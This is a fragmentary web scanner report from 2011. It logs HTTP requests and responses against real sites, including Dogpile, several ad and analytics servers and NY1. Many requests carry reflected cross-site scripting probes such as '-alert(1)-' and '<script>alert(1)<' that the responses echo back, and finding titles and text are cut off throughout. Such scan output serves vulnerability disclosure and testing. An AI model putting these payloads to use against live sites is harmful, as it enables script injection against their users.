GET /dogpile_other/ws/index HTTP/1.1 Host: www.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3792213258 Referer: http://www.google.com |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:56:34 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 45925 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... =true"); } .addSearchProvider { background-image:url( .tellFriendError{background-image:url( .tellFriendSuccess ...[SNIP]... |
GET /dogpile_other/ws/index HTTP/1.1 Host: www.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3792213258 Referer: http://www.google.com |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:56:34 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 45943 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dogpile.com |
Path: | /dogpile_other/ws/index |
GET /dogpile_other/ws/index HTTP/1.1 Host: www.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3792213258 |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:56:11 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 45927 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... =true"); } .addSearchProvider { background-image:url( .tellFriendError{background-image:url( .tellFriendSuccess ...[SNIP]... |
GET /dogpile_other/ws/index HTTP/1.1 Host: www.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3792213258 |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:56:06 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 45921 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/ns.androidtapp |
GET /adj/ns.androidtappc7384'-alert(1)- Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2 |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 484 Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:15:11 GMT Connection: close Set-Cookie: dc=dc-dal-sea; domain=collective-media var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var ifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/ns.androidtapp |
GET /adj/ns.androidtapp Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2 |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 484 Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:15:12 GMT Connection: close Set-Cookie: dc=dc-dal-sea; domain=collective-media var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var ifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/ns.androidtapp |
GET /adj/ns.androidtapp Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2 |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 488 Date: Fri, 01 Apr 2011 18:15:11 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc-dal-sea; domain=collective-media var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var ifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/ns.androidtapp |
GET /adj/ns.androidtapp Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2 |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 485 Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:15:11 GMT Connection: close Set-Cookie: dc=dc-dal-sea; domain=collective-media var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var ifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/ns.androidtapp |
GET /cmadjb1234'-alert(1)- Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2 |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7684 Date: Fri, 01 Apr 2011 18:15:56 GMT Connection: close function cmIV_(){var a=this;this.ts=null;this ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/ns.androidtapp |
GET /cmadj/ns.androidtappd7527'-alert(1)- Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2 |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:15:57 GMT Content-Length: 7683 Connection: close function cmIV_(){var a=this;this.ts=null;this ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/ns.androidtapp |
GET /cmadj/ns.androidtapp Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2 |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7684 Date: Fri, 01 Apr 2011 18:15:57 GMT Connection: close function cmIV_(){var a=this;this.ts=null;this ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/ns.androidtapp |
GET /cmadj/ns.androidtapp Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2 |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7576 Date: Fri, 01 Apr 2011 18:15:56 GMT Connection: close function cmIV_(){var a=this;this.ts=null;this ...[SNIP]... =ns;u=,ns-41308500 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.adxpose.com |
Path: | /ads/ads.js |
GET /ads/ads.js?uid Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: evlu=69a5d959-2383-46d3 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=E90BDFAA6 ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Content-Type: text/javascript;charset Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:11:10 GMT Connection: close if(typeof __ADXPOSE_CONTAINERS__=== ...[SNIP]... SE_LOG_EVENT__("000_000_3 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.ipinfodb.com |
Path: | /v2/ip_query_country.php |
GET /v2/ip_query_country.php Host: api.ipinfodb.com Proxy-Connection: keep-alive Referer: http://www.viagra.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 01 Apr 2011 17:31:16 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.7 Content-Length: 176 Content-Type: text/json; charset=UTF-8 visitorGeolocation { "Ip" : "173.193.214.243", "Status" : "OK", "CountryCode" : "US", "CountryName" : "United States" } ) |
Severity: | High |
Confidence: | Certain |
Host: | http://api.ipinfodb.com |
Path: | /v2/ip_query_country.php |
GET /v2/ip_query_country.php Host: api.ipinfodb.com Proxy-Connection: keep-alive Referer: http://www.viagra.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 01 Apr 2011 17:31:18 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.7 Content-Length: 177 Content-Type: text/json; charset=UTF-8 visitorGeolocation { "Ip" : "173.193.214.243", "Status" : "OK", "CountryCode" : "US", "CountryName" : "United States" } ) |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=7c3faf<script>alert(1)< Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.aeriagames.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Fri, 08 Apr 2011 18:17:20 GMT Date: Fri, 01 Apr 2011 18:17:20 GMT Content-Length: 1235 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... E.purge=function(a){try COMSCORE.beacon({c1:"7c3faf<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=7&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.aeriagames.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Fri, 08 Apr 2011 18:17:21 GMT Date: Fri, 01 Apr 2011 18:17:21 GMT Content-Length: 1235 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... .length-1;b>=0;b--){f COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"239b5<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=7&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.aeriagames.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Fri, 08 Apr 2011 18:17:21 GMT Date: Fri, 01 Apr 2011 18:17:21 GMT Content-Length: 1235 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... on(a){try{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"7", c2:"5964888b1cdd<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=7&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.aeriagames.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Fri, 08 Apr 2011 18:17:21 GMT Date: Fri, 01 Apr 2011 18:17:21 GMT Content-Length: 1235 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... y{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2c9e4f<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=7&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.aeriagames.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Fri, 08 Apr 2011 18:17:21 GMT Date: Fri, 01 Apr 2011 18:17:21 GMT Content-Length: 1235 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... =[],f,b;a=a||_comscore COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"ab948<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=7&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.aeriagames.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Fri, 08 Apr 2011 18:17:21 GMT Date: Fri, 01 Apr 2011 18:17:21 GMT Content-Length: 1235 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... ;a=a||_comscore;for(b=a COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"a8c59<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=7&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.aeriagames.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Fri, 08 Apr 2011 18:17:21 GMT Date: Fri, 01 Apr 2011 18:17:21 GMT Content-Length: 1235 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... comscore;for(b=a.length-1 COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"e1892<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://event.adxpose.com |
Path: | /event.flow |
GET /event.flow?eventcode=000 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: evlu=69a5d959-2383-46d3 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=B3FB1CE06 Cache-Control: no-store Content-Type: text/javascript;charset Content-Length: 145 Date: Fri, 01 Apr 2011 18:11:16 GMT if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__( |
Severity: | High |
Confidence: | Certain |
Host: | http://ib.adnxs.com |
Path: | /ab |
GET /ab?enc=pHA9CtcjI0Ck Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: icu=ChEIuCUQChgBIAEo |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 02-Apr-2011 18:11:41 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4470455573253905340 Content-Type: text/javascript Set-Cookie: uuid2=4470455573253905340 Set-Cookie: anj=Kfw)nCZ(]G)J7/O]F% Date: Fri, 01 Apr 2011 18:11:41 GMT Content-Length: 1458 document.write('<scr' + 'ipt language=\"Javascript\">< ...[SNIP]... OguAAC1AAAAlgIAAAIAA ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://manhattan.ny1.com |
Path: | /App_Skins/news1/favicon |
GET /App_Skinsd4fd7'%3b4584f664dff/news1/favicon.ico HTTP/1.1 Host: manhattan.ny1.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=154287268 |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Fri, 01 Apr 2011 18:11:29 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 56082 Vary: Accept-Encoding Cache-Control: public, max-age=550 Expires: Fri, 01 Apr 2011 18:20:40 GMT Date: Fri, 01 Apr 2011 18:11:30 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1.com </title><meta ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?404;http://manhattan ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://manhattan.ny1.com |
Path: | /App_Skins/news1/favicon |
GET /App_Skins/news16514e'%3bd51675d856b/favicon.ico HTTP/1.1 Host: manhattan.ny1.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=154287268 |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Fri, 01 Apr 2011 18:11:41 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 56080 Vary: Accept-Encoding Cache-Control: public, max-age=600 Expires: Fri, 01 Apr 2011 18:21:42 GMT Date: Fri, 01 Apr 2011 18:11:42 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1.com </title><meta ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?404;http://manhattan ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://manhattan.ny1.com |
Path: | /App_Skins/news1/favicon |
GET /App_Skins/news1/favicon Host: manhattan.ny1.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=154287268 |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Fri, 01 Apr 2011 18:11:52 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 56170 Vary: Accept-Encoding Cache-Control: public, max-age=600 Expires: Fri, 01 Apr 2011 18:21:53 GMT Date: Fri, 01 Apr 2011 18:11:53 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1.com </title><meta ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?aspxerrorpath=/App ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://manhattan.ny1.com |
Path: | /Content/ServeContent |
GET /Content42631'%3bc0299a9928d/ServeContent.aspx?id=709 Host: manhattan.ny1.com Proxy-Connection: keep-alive Referer: http://manhattan.ny1.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=tsgnewsglobal1 |
